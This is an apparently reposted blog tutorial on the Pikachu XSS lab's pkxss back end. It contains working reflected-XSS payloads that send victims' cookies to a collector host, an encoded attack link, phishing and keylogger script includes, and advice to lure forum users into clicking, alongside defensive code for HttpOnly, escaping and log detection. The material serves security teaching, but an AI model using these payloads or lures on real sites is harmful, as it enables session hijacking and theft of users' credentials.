
3-5 obtaining cookies through XSS and the use of XSS background management system

2022-04-23 20:44:00 Mountain Rabbit 1

XSS vulnerability testing: cookie theft and phishing attack demo

XSS vulnerability testing: cookie theft and exploitation

Covering both GET-type XSS exploitation and POST-type XSS exploitation

XSS vulnerability testing: phishing attacks

XSS vulnerability testing: capturing the user's keystrokes with XSS

The aim is a better understanding of how XSS works and how much harm it can do.

Case study 1: how does XSS obtain cookies?

GET-type XSS exploitation: obtaining cookies


Introduction to the pkxss management back end

In the Pikachu source package there is a pkxss directory. This directory can be taken out and deployed on its own: it is a back end that works independently, so we can put it under the web root by itself and visit it directly.


Start by opening the Pikachu site. Under Management Tools there is an XSS back end. The first time it is used it has to be installed; before installing, check config.inc.php in the inc folder of the code and


make sure the account and password configured there are correct. Then log in and have a look.


Click Cookie collection.


This is the results page; by default it holds no data.

Analysis of the cookie-collection back-end code

In the pkxss directory there is an xcookie module, which contains cookie.php. All the collected data is actually sent here.


It reads the request via GET and checks whether a cookie parameter was sent. If so, it records it, reads the Referer and User-Agent from the same request, and inserts them all into the database.

header("Location:http://192.168.1.4/pikachu/index.php");

A redirect is issued afterwards. In a real scenario, when a link is sent to someone and they click it, the page cannot simply end up blank, so the script finally redirects to a trusted page; once the victim has been redirected, they do not notice what the link has done. Usually it redirects to the home page of the site being visited, or to some other page. In this experiment it redirects to the home page of the vulnerable site.

pkxss_cookie_result.php is the query page, the back-end PHP file we just saw.


This file requires login, meaning only logged-in users can access it and view the XSS results. It reads the cookie information stored in the database and displays it.
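The collector above only works because the injected script can read the session cookie through document.cookie. As an added example, not code from Pikachu or pkxss, the following Node script models how a browser exposes cookies to page script: a cookie set with the HttpOnly attribute is still sent on every HTTP request, but is omitted from document.cookie, so a payload like the one on this page cannot read it. The Set-Cookie header values are constructed for the example and the session id is a placeholder.

```javascript
// Added example (not from the Pikachu/pkxss project): a minimal model of a
// browser cookie jar, showing the difference between what is sent to the
// server and what page script can read via document.cookie.

// Parse one Set-Cookie header value into {name, value, httpOnly, secure}.
function parseSetCookie(header) {
  const parts = header.split(";").map((p) => p.trim());
  const [name, ...rest] = parts[0].split("=");
  const attrs = parts.slice(1).map((a) => a.toLowerCase());
  return {
    name: name.trim(),
    value: rest.join("="), // keep any '=' inside the value
    httpOnly: attrs.includes("httponly"),
    secure: attrs.includes("secure"),
  };
}

// Store cookies by name; a later Set-Cookie for the same name overwrites.
function buildJar(setCookieHeaders) {
  const jar = new Map();
  for (const h of setCookieHeaders) {
    const c = parseSetCookie(h);
    jar.set(c.name, c);
  }
  return jar;
}

// What the browser puts in the Cookie request header: every cookie.
function cookieRequestHeader(jar) {
  return [...jar.values()].map((c) => `${c.name}=${c.value}`).join("; ");
}

// What page script sees via document.cookie: HttpOnly cookies are omitted.
function documentCookieView(jar) {
  return [...jar.values()]
    .filter((c) => !c.httpOnly)
    .map((c) => `${c.name}=${c.value}`)
    .join("; ");
}

// Constructed sample headers; "abc123sample" is a placeholder session id.
const SAMPLE_SET_COOKIE = [
  "PHPSESSID=abc123sample; Path=/; HttpOnly",
  "theme=dark; Path=/",
];

const sampleJar = buildJar(SAMPLE_SET_COOKIE);
console.log("Cookie header sent to server :", cookieRequestHeader(sampleJar));
console.log("document.cookie seen by script:", documentCookieView(sampleJar));
```

HttpOnly stops the cookie value from leaving the browser through document.cookie, but script that already runs in the page can still send requests that carry the cookie, so the attribute limits the damage rather than fixing the injection itself; output encoding of the reflected parameter remains the actual fix.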

Next, let's walk through GET-type XSS. First we remove the character-length limit on the input field.

I've prepared a piece of JS code here.

pkxss backstage :
http://192.168.1.15/pkxss/pkxss_login.php

<script>document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit



<img src="http://192.168.1.15/pkxss/xfish/fish.php" />
<script src="http://192.168.1.15/pkxss/xfish/fish.php"></script>

<script src="http://192.168.1.15/pkxss/rkeypress/rk.js"></script>

 Simulated malicious sites :
http://192.168.1.5/post.html

The script uses document.location to perform a redirect. As soon as the victim visits the page, the JS sends the browser to 192.168.1.15, our XSS back end, and whatever cookies the victim has are brought along: document.cookie reads the local cookies and they are appended to the URL, forming a complete GET request. We can copy this snippet,

<script>document.location = 'http://192.168.42.236/pikachu/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>

paste it into the input box and click submit.


The page returns to the home page. After the JS has executed locally, it reports back to the back end, so in theory we now have the cookie. Refresh the results page


and there is one more record here.
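The record appears because xss_reflected_get.php echoes the message parameter straight into the page. As an added example, not Pikachu's own code, here is that reflection pattern modelled in Node, with the vulnerable concatenation beside a hardened version that HTML-encodes the parameter before inserting it into an HTML text context; the payload string is the one shown above, as the server receives it after URL decoding.

```javascript
// Added example (not Pikachu's code): vulnerable vs. encoded reflection of a
// query parameter into an HTML text context.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;",
};

// Encode the five characters that matter in HTML text and attribute values.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable: the parameter is echoed into the page unchanged.
function renderVulnerable(message) {
  return `<p class="notice">${message}</p>`;
}

// Hardened: the same page, with the parameter encoded for an HTML text context.
function renderSafe(message) {
  return `<p class="notice">${escapeHtml(message)}</p>`;
}

// Crude check used here only to show the difference: does the rendered HTML
// still contain a script element that the browser would parse and run?
function containsScriptElement(html) {
  return /<script[\s>]/i.test(html);
}

// The payload from this page, after URL decoding.
const PAYLOAD =
  "<script>document.location = 'http://192.168.1.15/pkxss/xcookie/cookie.php?cookie=' + document.cookie;</script>";

console.log("vulnerable runs script:", containsScriptElement(renderVulnerable(PAYLOAD)));
console.log("encoded runs script   :", containsScriptElement(renderSafe(PAYLOAD)));
console.log(renderSafe(PAYLOAD));
```

The encoding has to match where the value lands: this table is right for HTML text and quoted attribute values, while a value placed inside a script block or a URL needs JavaScript-string or URL encoding instead.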

In a real scenario the URL is sent with the parameter URL-encoded: copy this URL and send it directly to the user.

http://192.168.1.4/pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit

For example, on a busy forum, while chatting with a user, you tell them it's an event page and trick them into clicking. Once the user opens the link in the browser, they are sent to the home page (or to any other page); the main purpose is to hide what happened behind the scenes.

That is the exploitation of reflected XSS via a GET request.
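Because the payload travels URL-encoded, as in the link above, it looks harmless in raw web-server logs. As an added example, not part of the original post, the following Node script scans access-log lines for reflected-XSS attempts: it pulls out the request path, URL-decodes the query string and flags script tags and document.cookie / document.location access. The log lines are constructed for this example, reusing the lab addresses and the encoded URL from this page.

```javascript
// Added example (not from the original post): detect URL-encoded reflected-XSS
// payloads in access-log lines by decoding the query string first.

// Constructed sample log lines in the common log format; the second one carries
// the encoded payload from this page.
const SAMPLE_LOG = [
  '192.168.1.20 - - [23/Apr/2022:20:44:00 +0800] "GET /pikachu/vul/xss/xss_reflected_get.php?message=hello&submit=submit HTTP/1.1" 200 2100',
  '192.168.1.20 - - [23/Apr/2022:20:45:10 +0800] "GET /pikachu/vul/xss/xss_reflected_get.php?message=%3Cscript%3Edocument.location+%3D+%27http%3A%2F%2F192.168.1.15%2Fpkxss%2Fxcookie%2Fcookie.php%3Fcookie%3D%27+%2B+document.cookie%3B%3C%2Fscript%3E&submit=submit HTTP/1.1" 302 0',
  '192.168.1.20 - - [23/Apr/2022:20:45:11 +0800] "GET /pikachu/index.php HTTP/1.1" 200 5400',
];

// Indicators matched against the DECODED query string.
const INDICATORS = [
  { name: "script-tag", re: /<\s*script\b/i },
  { name: "document.cookie", re: /document\s*\.\s*cookie/i },
  { name: "location-redirect", re: /(document|window)\s*\.\s*location\b/i },
];

// Form-style decoding: '+' is a space, then percent-decoding.
function decodeQuery(q) {
  try {
    return decodeURIComponent(q.replace(/\+/g, " "));
  } catch (e) {
    return q; // malformed encoding: fall back to inspecting the raw text
  }
}

// Extract the request target from a common/combined log line.
function extractRequestPath(line) {
  const m = line.match(/"(?:GET|POST|HEAD) (\S+) HTTP\/[\d.]+"/);
  return m ? m[1] : null;
}

// Returns {path, hits, decoded} for a log line, or null if it is not a request line.
function analyzeLine(line) {
  const target = extractRequestPath(line);
  if (!target) return null;
  const qIndex = target.indexOf("?");
  const path = qIndex === -1 ? target : target.slice(0, qIndex);
  const decoded = qIndex === -1 ? "" : decodeQuery(target.slice(qIndex + 1));
  const hits = INDICATORS.filter((i) => i.re.test(decoded)).map((i) => i.name);
  return { path, hits, decoded };
}

// Keep only the lines that matched at least one indicator.
function findSuspicious(lines) {
  return lines.map(analyzeLine).filter((r) => r && r.hits.length > 0);
}

for (const r of findSuspicious(SAMPLE_LOG)) {
  console.log(`${r.path}: ${r.hits.join(", ")}`);
}
```

A 302 response on a page that normally returns 200, as in the second sample line, is a useful secondary signal here, since the injected redirect changes the response the server records.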

Copyright notice
This article was written by [Mountain Rabbit 1]; please include the original link when reposting. Thank you.
https://yzsam.com/2022/04/202204232041051268.html